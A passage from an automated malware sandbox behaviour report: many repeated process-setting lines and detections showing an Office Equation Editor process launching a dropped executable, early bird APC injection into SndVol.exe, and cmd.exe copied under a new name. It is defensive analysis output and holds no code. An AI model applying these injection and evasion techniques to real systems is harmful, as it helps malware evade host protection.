                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3640Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3228Thread sleep time: -60000s >= -30000sJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Early bird code injection technique detected
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exeJump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 8B0000 protect: page execute and read and writeJump to behavior
                  Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Queues an APC in another process (thread injection)
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeThread APC queued: target process: C:\Windows\SysWOW64\SndVol.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodg.exe "C:\Users\user\AppData\Roaming\audiodg.exe" Jump to behavior
